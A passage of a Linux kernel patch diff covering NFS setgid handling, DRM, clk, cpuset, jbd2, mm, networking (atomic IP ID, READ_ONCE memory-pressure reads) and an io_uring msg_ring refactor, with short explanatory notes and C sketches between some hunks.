+ 				iap->ia_mode &= ~S_ISGID;
+ 		} else {
+ 			/* set ATTR_KILL_* bits and let VFS handle it */
+-			iap->ia_valid |= (ATTR_KILL_SUID | ATTR_KILL_SGID);
++			iap->ia_valid |= ATTR_KILL_SUID;
++			iap->ia_valid |=
++				setattr_should_drop_sgid(&init_user_ns, inode);
+ 		}
+ 	}
+ }
+diff --git a/include/drm/display/drm_dp.h b/include/drm/display/drm_dp.h
+index 05f2cc03d03d9..b235d6833e27d 100644
+--- a/include/drm/display/drm_dp.h
++++ b/include/drm/display/drm_dp.h
+@@ -1525,7 +1525,7 @@ enum drm_dp_phy {
+ 
+ #define DP_BRANCH_OUI_HEADER_SIZE	0xc
+ #define DP_RECEIVER_CAP_SIZE		0xf
+-#define DP_DSC_RECEIVER_CAP_SIZE        0xf
++#define DP_DSC_RECEIVER_CAP_SIZE        0x10 /* DSC Capabilities 0x60 through 0x6F */
+ #define EDP_PSR_RECEIVER_CAP_SIZE	2
+ #define EDP_DISPLAY_CTL_CAP_SIZE	3
+ #define DP_LTTPR_COMMON_CAP_SIZE	8
+diff --git a/include/drm/drm_aperture.h b/include/drm/drm_aperture.h
+index 7096703c39493..cbe33b49fd5dc 100644
+--- a/include/drm/drm_aperture.h
++++ b/include/drm/drm_aperture.h
+@@ -13,14 +13,13 @@ int devm_aperture_acquire_from_firmware(struct drm_device *dev, resource_size_t
+ 					resource_size_t size);
+ 
+ int drm_aperture_remove_conflicting_framebuffers(resource_size_t base, resource_size_t size,
+-						 bool primary, const struct drm_driver *req_driver);
++						 const struct drm_driver *req_driver);
+ 
+ int drm_aperture_remove_conflicting_pci_framebuffers(struct pci_dev *pdev,
+ 						     const struct drm_driver *req_driver);
+ 
+ /**
+  * drm_aperture_remove_framebuffers - remove all existing framebuffers
+- * @primary: also kick vga16fb if present
+  * @req_driver: requesting DRM driver
+  *
+  * This function removes all graphics device drivers. Use this function on systems
+@@ -30,9 +29,9 @@ int drm_aperture_remove_conflicting_pci_framebuffers(struct pci_dev *pdev,
+  * 0 on success, or a negative errno code otherwise
+  */
+ static inline int
+-drm_aperture_remove_framebuffers(bool primary, const struct drm_driver *req_driver)
++drm_aperture_remove_framebuffers(const struct drm_driver *req_driver)
+ {
+-	return drm_aperture_remove_conflicting_framebuffers(0, (resource_size_t)-1, primary,
++	return drm_aperture_remove_conflicting_framebuffers(0, (resource_size_t)-1,
+ 							    req_driver);
+ }
+ 
+diff --git a/include/linux/clk.h b/include/linux/clk.h
+index 1ef0133242374..06f1b292f8a00 100644
+--- a/include/linux/clk.h
++++ b/include/linux/clk.h
+@@ -183,6 +183,39 @@ int clk_get_scaled_duty_cycle(struct clk *clk, unsigned int scale);
+  */
+ bool clk_is_match(const struct clk *p, const struct clk *q);
+ 
++/**
++ * clk_rate_exclusive_get - get exclusivity over the rate control of a
++ *                          producer
++ * @clk: clock source
++ *
++ * This function allows drivers to get exclusive control over the rate of a
++ * provider. It prevents any other consumer from executing, even indirectly,
++ * an operation which could alter the rate of the provider or cause glitches.
++ *
++ * If exclusivity is claimed more than once on a clock, even by the same driver,
++ * the rate effectively gets locked as exclusivity can't be preempted.
++ *
++ * Must not be called from within atomic context.
++ *
++ * Returns success (0) or negative errno.
++ */
++int clk_rate_exclusive_get(struct clk *clk);
++
++/**
++ * clk_rate_exclusive_put - release exclusivity over the rate control of a
++ *                          producer
++ * @clk: clock source
++ *
++ * This function allows drivers to release the exclusivity it previously got
++ * from clk_rate_exclusive_get()
++ *
++ * The caller must balance the number of clk_rate_exclusive_get() and
++ * clk_rate_exclusive_put() calls.
++ *
++ * Must not be called from within atomic context.
++ */
++void clk_rate_exclusive_put(struct clk *clk);
++
+ #else
+ 
+ static inline int clk_notifier_register(struct clk *clk,
+@@ -236,6 +269,13 @@ static inline bool clk_is_match(const struct clk *p, const struct clk *q)
+ 	return p == q;
+ }
+ 
++static inline int clk_rate_exclusive_get(struct clk *clk)
++{
++	return 0;
++}
++
++static inline void clk_rate_exclusive_put(struct clk *clk) {}
++
+ #endif
+ 
+ #ifdef CONFIG_HAVE_CLK_PREPARE
+@@ -583,38 +623,6 @@ struct clk *devm_clk_get_optional_enabled(struct device *dev, const char *id);
+  */
+ struct clk *devm_get_clk_from_child(struct device *dev,
+ 				    struct device_node *np, const char *con_id);
+-/**
+- * clk_rate_exclusive_get - get exclusivity over the rate control of a
+- *                          producer
+- * @clk: clock source
+- *
+- * This function allows drivers to get exclusive control over the rate of a
+- * provider. It prevents any other consumer to execute, even indirectly,
+- * opereation which could alter the rate of the provider or cause glitches
+- *
+- * If exlusivity is claimed more than once on clock, even by the same driver,
+- * the rate effectively gets locked as exclusivity can't be preempted.
+- *
+- * Must not be called from within atomic context.
+- *
+- * Returns success (0) or negative errno.
+- */
+-int clk_rate_exclusive_get(struct clk *clk);
+-
+-/**
+- * clk_rate_exclusive_put - release exclusivity over the rate control of a
+- *                          producer
+- * @clk: clock source
+- *
+- * This function allows drivers to release the exclusivity it previously got
+- * from clk_rate_exclusive_get()
+- *
+- * The caller must balance the number of clk_rate_exclusive_get() and
+- * clk_rate_exclusive_put() calls.
+- *
+- * Must not be called from within atomic context.
+- */
+-void clk_rate_exclusive_put(struct clk *clk);
+ 
+ /**
+  * clk_enable - inform the system when the clock source should be running.
+@@ -974,14 +982,6 @@ static inline void clk_bulk_put_all(int num_clks, struct clk_bulk_data *clks) {}
+ 
+ static inline void devm_clk_put(struct device *dev, struct clk *clk) {}
+ 
+-
+-static inline int clk_rate_exclusive_get(struct clk *clk)
+-{
+-	return 0;
+-}
+-
+-static inline void clk_rate_exclusive_put(struct clk *clk) {}
+-
+ static inline int clk_enable(struct clk *clk)
+ {
+ 	return 0;
+diff --git a/include/linux/cpuset.h b/include/linux/cpuset.h
+index d58e0476ee8e3..0348dba5680ef 100644
+--- a/include/linux/cpuset.h
++++ b/include/linux/cpuset.h
+@@ -71,8 +71,10 @@ extern void cpuset_init_smp(void);
+ extern void cpuset_force_rebuild(void);
+ extern void cpuset_update_active_cpus(void);
+ extern void cpuset_wait_for_hotplug(void);
+-extern void cpuset_read_lock(void);
+-extern void cpuset_read_unlock(void);
++extern void inc_dl_tasks_cs(struct task_struct *task);
++extern void dec_dl_tasks_cs(struct task_struct *task);
++extern void cpuset_lock(void);
++extern void cpuset_unlock(void);
+ extern void cpuset_cpus_allowed(struct task_struct *p, struct cpumask *mask);
+ extern bool cpuset_cpus_allowed_fallback(struct task_struct *p);
+ extern nodemask_t cpuset_mems_allowed(struct task_struct *p);
+@@ -196,8 +198,10 @@ static inline void cpuset_update_active_cpus(void)
+ 
+ static inline void cpuset_wait_for_hotplug(void) { }
+ 
+-static inline void cpuset_read_lock(void) { }
+-static inline void cpuset_read_unlock(void) { }
++static inline void inc_dl_tasks_cs(struct task_struct *task) { }
++static inline void dec_dl_tasks_cs(struct task_struct *task) { }
++static inline void cpuset_lock(void) { }
++static inline void cpuset_unlock(void) { }
+ 
+ static inline void cpuset_cpus_allowed(struct task_struct *p,
+ 				       struct cpumask *mask)
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index a2b5592c68284..26ea1a0a59a10 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -3120,6 +3120,8 @@ extern struct inode *new_inode(struct super_block *sb);
+ extern void free_inode_nonrcu(struct inode *inode);
+ extern int setattr_should_drop_suidgid(struct user_namespace *, struct inode *);
+ extern int file_remove_privs(struct file *);
++int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
++			     const struct inode *inode);
+ 
+ /*
+  * This must be used for allocating filesystems specific inodes to set
+diff --git a/include/linux/jbd2.h b/include/linux/jbd2.h
+index 0b7242370b567..ebb1608d9dcd2 100644
+--- a/include/linux/jbd2.h
++++ b/include/linux/jbd2.h
+@@ -622,12 +622,6 @@ struct transaction_s
+ 	 */
+ 	struct journal_head	*t_checkpoint_list;
+ 
+-	/*
+-	 * Doubly-linked circular list of all buffers submitted for IO while
+-	 * checkpointing. [j_list_lock]
+-	 */
+-	struct journal_head	*t_checkpoint_io_list;
+-
+ 	/*
+ 	 * Doubly-linked circular list of metadata buffers being
+ 	 * shadowed by log IO.  The IO buffers on the iobuf list and
+@@ -1441,6 +1435,7 @@ extern void jbd2_journal_commit_transaction(journal_t *);
+ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy);
+ unsigned long jbd2_journal_shrink_checkpoint_list(journal_t *journal, unsigned long *nr_to_scan);
+ int __jbd2_journal_remove_checkpoint(struct journal_head *);
++int jbd2_journal_try_remove_checkpoint(struct journal_head *jh);
+ void jbd2_journal_destroy_checkpoint(journal_t *journal);
+ void __jbd2_journal_insert_checkpoint(struct journal_head *, transaction_t *);
+ 
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index b8ed44f401b58..104ec00823da8 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -1727,6 +1727,25 @@ static inline size_t folio_size(struct folio *folio)
+ 	return PAGE_SIZE << folio_order(folio);
+ }
+ 
++/**
++ * folio_estimated_sharers - Estimate the number of sharers of a folio.
++ * @folio: The folio.
++ *
++ * folio_estimated_sharers() aims to serve as a function to efficiently
++ * estimate the number of processes sharing a folio. This is done by
++ * looking at the precise mapcount of the first subpage in the folio, and
++ * assuming the other subpages are the same. This may not be true for large
++ * folios. If you want exact mapcounts for exact calculations, look at
++ * page_mapcount() or folio_total_mapcount().
++ *
++ * Return: The estimated number of processes sharing a folio.
++ */
++static inline int folio_estimated_sharers(struct folio *folio)
++{
++	return page_mapcount(folio_page(folio, 0));
++}
++
++
+ #ifndef HAVE_ARCH_MAKE_PAGE_ACCESSIBLE
+ static inline int arch_make_page_accessible(struct page *page)
+ {
+@@ -3091,6 +3110,16 @@ static inline bool gup_must_unshare(unsigned int flags, struct page *page)
+ 	if (IS_ENABLED(CONFIG_HAVE_FAST_GUP))
+ 		smp_rmb();
+ 
++	/*
++	 * During GUP-fast we might not get called on the head page for a
++	 * hugetlb page that is mapped using cont-PTE, because GUP-fast does
++	 * not work with the abstracted hugetlb PTEs that always point at the
++	 * head page. For hugetlb, PageAnonExclusive only applies on the head
++	 * page (as it cannot be partially COW-shared), so lookup the head page.
++	 */
++	if (unlikely(!PageHead(page) && PageHuge(page)))
++		page = compound_head(page);
++
+ 	/*
+ 	 * Note that PageKsm() pages cannot be exclusive, and consequently,
+ 	 * cannot get pinned.
+diff --git a/include/linux/raid_class.h b/include/linux/raid_class.h
+index 5cdfcb873a8f0..772d45b2a60a0 100644
+--- a/include/linux/raid_class.h
++++ b/include/linux/raid_class.h
+@@ -77,7 +77,3 @@ DEFINE_RAID_ATTRIBUTE(enum raid_state, state)
+ 	
+ struct raid_template *raid_class_attach(struct raid_function_template *);
+ void raid_class_release(struct raid_template *);
+-
+-int __must_check raid_component_add(struct raid_template *, struct device *,
+-				    struct device *);
+-
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index ffb6eb55cd135..0cac69902ec58 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -1846,7 +1846,9 @@ current_restore_flags(unsigned long orig_flags, unsigned long flags)
+ }
+ 
+ extern int cpuset_cpumask_can_shrink(const struct cpumask *cur, const struct cpumask *trial);
+-extern int task_can_attach(struct task_struct *p, const struct cpumask *cs_effective_cpus);
++extern int task_can_attach(struct task_struct *p);
++extern int dl_bw_alloc(int cpu, u64 dl_bw);
++extern void dl_bw_free(int cpu, u64 dl_bw);
+ #ifdef CONFIG_SMP
+ extern void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask);
+ extern int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask);
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index 17329a19f0c64..9a3ac960dfe15 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -727,23 +727,14 @@ static inline struct slave *bond_slave_has_mac(struct bonding *bond,
+ }
+ 
+ /* Caller must hold rcu_read_lock() for read */
+-static inline bool bond_slave_has_mac_rx(struct bonding *bond, const u8 *mac)
++static inline bool bond_slave_has_mac_rcu(struct bonding *bond, const u8 *mac)
+ {
+ 	struct list_head *iter;
+ 	struct slave *tmp;
+-	struct netdev_hw_addr *ha;
+ 
+ 	bond_for_each_slave_rcu(bond, tmp, iter)
+ 		if (ether_addr_equal_64bits(mac, tmp->dev->dev_addr))
+ 			return true;
+-
+-	if (netdev_uc_empty(bond->dev))
+-		return false;
+-
+-	netdev_for_each_uc_addr(ha, bond->dev)
+-		if (ether_addr_equal_64bits(mac, ha->addr))
+-			return true;
+-
+ 	return false;
+ }
+ 
+diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h
+index c8ef3b881f03d..c2432c2addc82 100644
+--- a/include/net/inet_sock.h
++++ b/include/net/inet_sock.h
+@@ -222,8 +222,8 @@ struct inet_sock {
+ 	__s16			uc_ttl;
+ 	__u16			cmsg_flags;
+ 	struct ip_options_rcu __rcu	*inet_opt;
++	atomic_t		inet_id;
+ 	__be16			inet_sport;
+-	__u16			inet_id;
+ 
+ 	__u8			tos;
+ 	__u8			min_ttl;
+diff --git a/include/net/ip.h b/include/net/ip.h
+index 530e7257e4389..1872f570abeda 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -532,8 +532,19 @@ static inline void ip_select_ident_segs(struct net *net, struct sk_buff *skb,
+ 	 * generator as much as we can.
+ 	 */
+ 	if (sk && inet_sk(sk)->inet_daddr) {
+-		iph->id = htons(inet_sk(sk)->inet_id);
+-		inet_sk(sk)->inet_id += segs;
++		int val;
++
++		/* avoid atomic operations for TCP,
++		 * as we hold socket lock at this point.
++		 */
++		if (sk_is_tcp(sk)) {
++			sock_owned_by_me(sk);
++			val = atomic_read(&inet_sk(sk)->inet_id);
++			atomic_set(&inet_sk(sk)->inet_id, val + segs);
++		} else {
++			val = atomic_add_return(segs, &inet_sk(sk)->inet_id);
++		}
++		iph->id = htons(val);
+ 		return;
+ 	}
+ 	if ((iph->frag_off & htons(IP_DF)) && !skb->ignore_df) {
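
This hunk turns inet_id into an atomic_t so unlocked senders no longer race on the IP ID counter, while TCP, which owns the socket lock at this point, keeps a cheaper plain load/store pair. A rough C11 sketch of that locked-vs-lockless split, with an illustrative struct rather than the kernel's:

    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdint.h>

    struct sock_ids { atomic_int inet_id; };

    /*
     * Under the owner's lock a plain load/store pair suffices (and, as in
     * the TCP path above, hands back the pre-increment value); without
     * the lock, one atomic RMW keeps concurrent callers race-free.
     */
    static uint16_t ip_next_id(struct sock_ids *s, int segs, bool owner_locked)
    {
            int val;

            if (owner_locked) {
                    val = atomic_load_explicit(&s->inet_id,
                                               memory_order_relaxed);
                    atomic_store_explicit(&s->inet_id, val + segs,
                                          memory_order_relaxed);
            } else {
                    val = atomic_fetch_add_explicit(&s->inet_id, segs,
                                                    memory_order_relaxed) + segs;
            }
            return (uint16_t)val;
    }
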
+diff --git a/include/net/mac80211.h b/include/net/mac80211.h
+index 72b739dc6d530..8a338c33118f9 100644
+--- a/include/net/mac80211.h
++++ b/include/net/mac80211.h
+@@ -6444,6 +6444,7 @@ void ieee80211_stop_rx_ba_session(struct ieee80211_vif *vif, u16 ba_rx_bitmap,
+  * marks frames marked in the bitmap as having been filtered. Afterwards, it
+  * checks if any frames in the window starting from @ssn can now be released
+  * (in case they were only waiting for frames that were filtered.)
++ * (Only works correctly if @max_rx_aggregation_subframes <= 64 frames)
+  */
+ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 					  u16 ssn, u64 filtered,
+diff --git a/include/net/rtnetlink.h b/include/net/rtnetlink.h
+index bf8bb33578250..9f881b74f32ed 100644
+--- a/include/net/rtnetlink.h
++++ b/include/net/rtnetlink.h
+@@ -189,8 +189,8 @@ struct net_device *rtnl_create_link(struct net *net, const char *ifname,
+ int rtnl_delete_link(struct net_device *dev);
+ int rtnl_configure_link(struct net_device *dev, const struct ifinfomsg *ifm);
+ 
+-int rtnl_nla_parse_ifla(struct nlattr **tb, const struct nlattr *head, int len,
+-			struct netlink_ext_ack *exterr);
++int rtnl_nla_parse_ifinfomsg(struct nlattr **tb, const struct nlattr *nla_peer,
++			     struct netlink_ext_ack *exterr);
+ struct net *rtnl_get_net_ns_capable(struct sock *sk, int netnsid);
+ 
+ #define MODULE_ALIAS_RTNL_LINK(kind) MODULE_ALIAS("rtnl-link-" kind)
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 699408944952c..d1f936ed97556 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1320,6 +1320,7 @@ struct proto {
+ 	/*
+ 	 * Pressure flag: try to collapse.
+ 	 * Technical note: it is used by multiple contexts non atomically.
++	 * Make sure to use READ_ONCE()/WRITE_ONCE() for all reads/writes.
+ 	 * All the __sk_mem_schedule() is of this nature: accounting
+ 	 * is strict, actions are advisory and have some latency.
+ 	 */
+@@ -1448,7 +1449,7 @@ static inline bool sk_has_memory_pressure(const struct sock *sk)
+ static inline bool sk_under_global_memory_pressure(const struct sock *sk)
+ {
+ 	return sk->sk_prot->memory_pressure &&
+-		!!*sk->sk_prot->memory_pressure;
++		!!READ_ONCE(*sk->sk_prot->memory_pressure);
+ }
+ 
+ static inline bool sk_under_memory_pressure(const struct sock *sk)
+@@ -1460,7 +1461,7 @@ static inline bool sk_under_memory_pressure(const struct sock *sk)
+ 	    mem_cgroup_under_socket_pressure(sk->sk_memcg))
+ 		return true;
+ 
+-	return !!*sk->sk_prot->memory_pressure;
++	return !!READ_ONCE(*sk->sk_prot->memory_pressure);
+ }
+ 
+ static inline long
+@@ -1537,7 +1538,7 @@ proto_memory_pressure(struct proto *prot)
+ {
+ 	if (!prot->memory_pressure)
+ 		return false;
+-	return !!*prot->memory_pressure;
++	return !!READ_ONCE(*prot->memory_pressure);
+ }
+ 
+ 
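
Since memory_pressure is, per the comment above, used by multiple contexts non-atomically, the readers are switched to READ_ONCE() so the compiler emits exactly one untorn load that it cannot fuse or repeat. A minimal sketch of that contract, using the classic volatile-cast macro forms for illustration only (the kernel's definitions handle more cases):

    #define READ_ONCE(x)      (*(const volatile __typeof__(x) *)&(x))
    #define WRITE_ONCE(x, v)  (*(volatile __typeof__(x) *)&(x) = (v))

    static unsigned long memory_pressure;  /* set/cleared by one side */

    static int under_pressure(void)        /* read locklessly */
    {
            /* one real load per call: no tearing, fusing, or re-reads */
            return !!READ_ONCE(memory_pressure);
    }

    static void mark_pressure(unsigned long on)
    {
            WRITE_ONCE(memory_pressure, on);
    }
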
+diff --git a/include/trace/events/jbd2.h b/include/trace/events/jbd2.h
+index 8f5ee380d3093..5646ae15a957a 100644
+--- a/include/trace/events/jbd2.h
++++ b/include/trace/events/jbd2.h
+@@ -462,11 +462,9 @@ TRACE_EVENT(jbd2_shrink_scan_exit,
+ TRACE_EVENT(jbd2_shrink_checkpoint_list,
+ 
+ 	TP_PROTO(journal_t *journal, tid_t first_tid, tid_t tid, tid_t last_tid,
+-		 unsigned long nr_freed, unsigned long nr_scanned,
+-		 tid_t next_tid),
++		 unsigned long nr_freed, tid_t next_tid),
+ 
+-	TP_ARGS(journal, first_tid, tid, last_tid, nr_freed,
+-		nr_scanned, next_tid),
++	TP_ARGS(journal, first_tid, tid, last_tid, nr_freed, next_tid),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t, dev)
+@@ -474,7 +472,6 @@ TRACE_EVENT(jbd2_shrink_checkpoint_list,
+ 		__field(tid_t, tid)
+ 		__field(tid_t, last_tid)
+ 		__field(unsigned long, nr_freed)
+-		__field(unsigned long, nr_scanned)
+ 		__field(tid_t, next_tid)
+ 	),
+ 
+@@ -484,15 +481,14 @@ TRACE_EVENT(jbd2_shrink_checkpoint_list,
+ 		__entry->tid		= tid;
+ 		__entry->last_tid	= last_tid;
+ 		__entry->nr_freed	= nr_freed;
+-		__entry->nr_scanned	= nr_scanned;
+ 		__entry->next_tid	= next_tid;
+ 	),
+ 
+ 	TP_printk("dev %d,%d shrink transaction %u-%u(%u) freed %lu "
+-		  "scanned %lu next transaction %u",
++		  "next transaction %u",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev),
+ 		  __entry->first_tid, __entry->tid, __entry->last_tid,
+-		  __entry->nr_freed, __entry->nr_scanned, __entry->next_tid)
++		  __entry->nr_freed, __entry->next_tid)
+ );
+ 
+ #endif /* _TRACE_JBD2_H */
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index 3526389ac2180..cd922d2bef5f5 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -15,6 +15,7 @@
+ 
+ struct io_msg {
+ 	struct file			*file;
++	struct file			*src_file;
+ 	u64 user_data;
+ 	u32 len;
+ 	u32 cmd;
+@@ -23,33 +24,12 @@ struct io_msg {
+ 	u32 flags;
+ };
+ 
+-static int io_msg_ring_data(struct io_kiocb *req)
++static void io_double_unlock_ctx(struct io_ring_ctx *octx)
+ {
+-	struct io_ring_ctx *target_ctx = req->file->private_data;
+-	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
+-
+-	if (msg->src_fd || msg->dst_fd || msg->flags)
+-		return -EINVAL;
+-	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
+-		return -EBADFD;
+-
+-	if (io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
+-		return 0;
+-
+-	return -EOVERFLOW;
+-}
+-
+-static void io_double_unlock_ctx(struct io_ring_ctx *ctx,
+-				 struct io_ring_ctx *octx,
+-				 unsigned int issue_flags)
+-{
+-	if (issue_flags & IO_URING_F_UNLOCKED)
+-		mutex_unlock(&ctx->uring_lock);
+ 	mutex_unlock(&octx->uring_lock);
+ }
+ 
+-static int io_double_lock_ctx(struct io_ring_ctx *ctx,
+-			      struct io_ring_ctx *octx,
++static int io_double_lock_ctx(struct io_ring_ctx *octx,
+ 			      unsigned int issue_flags)
+ {
+ 	/*
+@@ -62,60 +42,86 @@ static int io_double_lock_ctx(struct io_ring_ctx *ctx,
+ 			return -EAGAIN;
+ 		return 0;
+ 	}
++	mutex_lock(&octx->uring_lock);
++	return 0;
++}
+ 
+-	/* Always grab smallest value ctx first. We know ctx != octx. */
+-	if (ctx < octx) {
+-		mutex_lock(&ctx->uring_lock);
+-		mutex_lock(&octx->uring_lock);
+-	} else {
+-		mutex_lock(&octx->uring_lock);
+-		mutex_lock(&ctx->uring_lock);
+-	}
++void io_msg_ring_cleanup(struct io_kiocb *req)
++{
++	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
+ 
+-	return 0;
++	if (WARN_ON_ONCE(!msg->src_file))
++		return;
++
++	fput(msg->src_file);
++	msg->src_file = NULL;
+ }
+ 
+-static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
++static int io_msg_ring_data(struct io_kiocb *req, unsigned int issue_flags)
+ {
+ 	struct io_ring_ctx *target_ctx = req->file->private_data;
+ 	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
+-	struct io_ring_ctx *ctx = req->ctx;
+-	unsigned long file_ptr;
+-	struct file *src_file;
+ 	int ret;
+ 
+-	if (msg->len)
+-		return -EINVAL;
+-	if (target_ctx == ctx)
++	if (msg->src_fd || msg->dst_fd || msg->flags)
+ 		return -EINVAL;
+ 	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
+ 		return -EBADFD;
+ 
+-	ret = io_double_lock_ctx(ctx, target_ctx, issue_flags);
+-	if (unlikely(ret))
+-		return ret;
++	ret = -EOVERFLOW;
++	if (target_ctx->flags & IORING_SETUP_IOPOLL) {
++		if (unlikely(io_double_lock_ctx(target_ctx, issue_flags)))
++			return -EAGAIN;
++		if (io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
++			ret = 0;
++		io_double_unlock_ctx(target_ctx);
++	} else {
++		if (io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
++			ret = 0;
++	}
+ 
+-	ret = -EBADF;
+-	if (unlikely(msg->src_fd >= ctx->nr_user_files))
+-		goto out_unlock;
++	return ret;
++}
+ 
+-	msg->src_fd = array_index_nospec(msg->src_fd, ctx->nr_user_files);
+-	file_ptr = io_fixed_file_slot(&ctx->file_table, msg->src_fd)->file_ptr;
+-	if (!file_ptr)
+-		goto out_unlock;
++static struct file *io_msg_grab_file(struct io_kiocb *req, unsigned int issue_flags)
++{
++	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
++	struct io_ring_ctx *ctx = req->ctx;
++	struct file *file = NULL;
++	unsigned long file_ptr;
++	int idx = msg->src_fd;
++
++	io_ring_submit_lock(ctx, issue_flags);
++	if (likely(idx < ctx->nr_user_files)) {
++		idx = array_index_nospec(idx, ctx->nr_user_files);
++		file_ptr = io_fixed_file_slot(&ctx->file_table, idx)->file_ptr;
++		file = (struct file *) (file_ptr & FFS_MASK);
++		if (file)
++			get_file(file);
++	}
++	io_ring_submit_unlock(ctx, issue_flags);
++	return file;
++}
+ 
+-	src_file = (struct file *) (file_ptr & FFS_MASK);
+-	get_file(src_file);
++static int io_msg_install_complete(struct io_kiocb *req, unsigned int issue_flags)
++{
++	struct io_ring_ctx *target_ctx = req->file->private_data;
++	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
++	struct file *src_file = msg->src_file;
++	int ret;
++
++	if (unlikely(io_double_lock_ctx(target_ctx, issue_flags)))
++		return -EAGAIN;
+ 
+ 	ret = __io_fixed_fd_install(target_ctx, src_file, msg->dst_fd);
+-	if (ret < 0) {
+-		fput(src_file);
++	if (ret < 0)
+ 		goto out_unlock;
+-	}
++
++	msg->src_file = NULL;
++	req->flags &= ~REQ_F_NEED_CLEANUP;
+ 
+ 	if (msg->flags & IORING_MSG_RING_CQE_SKIP)
+ 		goto out_unlock;
+-
+ 	/*
+ 	 * If this fails, the target still received the file descriptor but
+ 	 * wasn't notified of the fact. This means that if this request
+@@ -125,10 +131,29 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (!io_post_aux_cqe(target_ctx, msg->user_data, ret, 0, true))
+ 		ret = -EOVERFLOW;
+ out_unlock:
+-	io_double_unlock_ctx(ctx, target_ctx, issue_flags);
++	io_double_unlock_ctx(target_ctx);
+ 	return ret;
+ }
+ 
++static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
++{
++	struct io_ring_ctx *target_ctx = req->file->private_data;
++	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
++	struct io_ring_ctx *ctx = req->ctx;
++	struct file *src_file = msg->src_file;
++
++	if (target_ctx == ctx)
++		return -EINVAL;
++	if (!src_file) {
++		src_file = io_msg_grab_file(req, issue_flags);
++		if (!src_file)
++			return -EBADF;
++		msg->src_file = src_file;
++		req->flags |= REQ_F_NEED_CLEANUP;
++	}
++	return io_msg_install_complete(req, issue_flags);
++}
++
+ int io_msg_ring_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ {
+ 	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
+@@ -136,6 +161,7 @@ int io_msg_ring_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	if (unlikely(sqe->buf_index || sqe->personality))
+ 		return -EINVAL;
+ 
++	msg->src_file = NULL;
+ 	msg->user_data = READ_ONCE(sqe->off);
+ 	msg->len = READ_ONCE(sqe->len);
+ 	msg->cmd = READ_ONCE(sqe->addr);
+@@ -159,7 +185,7 @@ int io_msg_ring(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	switch (msg->cmd) {
+ 	case IORING_MSG_DATA:
+-		ret = io_msg_ring_data(req);
++		ret = io_msg_ring_data(req, issue_flags);
+ 		break;
+ 	case IORING_MSG_SEND_FD:
+ 		ret = io_msg_send_fd(req, issue_flags);
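
The refactor above stops taking both ring locks in address order; the source file reference is instead grabbed once, cached on the request, and REQ_F_NEED_CLEANUP routes every exit path, including -EAGAIN retries, through the new io_msg_ring_cleanup(). A hedged sketch of that grab-once/cleanup-hook ownership shape, with illustrative names throughout:

    #include <stdlib.h>

    #define REQ_NEED_CLEANUP  0x1

    struct req {
            void         *src;    /* cached counted reference */
            unsigned int  flags;
    };

    static void *grab_ref(void)   { return malloc(1); }  /* stand-in */
    static void  put_ref(void *r) { free(r); }           /* stand-in */

    static int req_send(struct req *req)
    {
            if (!req->src) {
                    req->src = grab_ref();
                    if (!req->src)
                            return -1;              /* -EBADF upstream */
                    req->flags |= REQ_NEED_CLEANUP; /* hook owns it now */
            }
            /* ... may fail with a retryable error; req->src is kept ... */
            return 0;
    }

    static void req_cleanup(struct req *req)  /* runs once on completion */
    {
            if (req->flags & REQ_NEED_CLEANUP) {
                    put_ref(req->src);
                    req->src = NULL;
                    req->flags &= ~REQ_NEED_CLEANUP;
            }
    }
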
+diff --git a/io_uring/msg_ring.h b/io_uring/msg_ring.h
+index fb9601f202d07..3987ee6c0e5f1 100644
+--- a/io_uring/msg_ring.h
++++ b/io_uring/msg_ring.h
+@@ -2,3 +2,4 @@
+ 
+ int io_msg_ring_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe);
+ int io_msg_ring(struct io_kiocb *req, unsigned int issue_flags);
++void io_msg_ring_cleanup(struct io_kiocb *req);
+diff --git a/io_uring/opdef.c b/io_uring/opdef.c
+index 04dd2c983fce4..3aa0d65c50e34 100644
+--- a/io_uring/opdef.c
++++ b/io_uring/opdef.c
+@@ -445,6 +445,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.name			= "MSG_RING",
+ 		.prep			= io_msg_ring_prep,
+ 		.issue			= io_msg_ring,
++		.cleanup		= io_msg_ring_cleanup,
+ 	},
+ 	[IORING_OP_FSETXATTR] = {
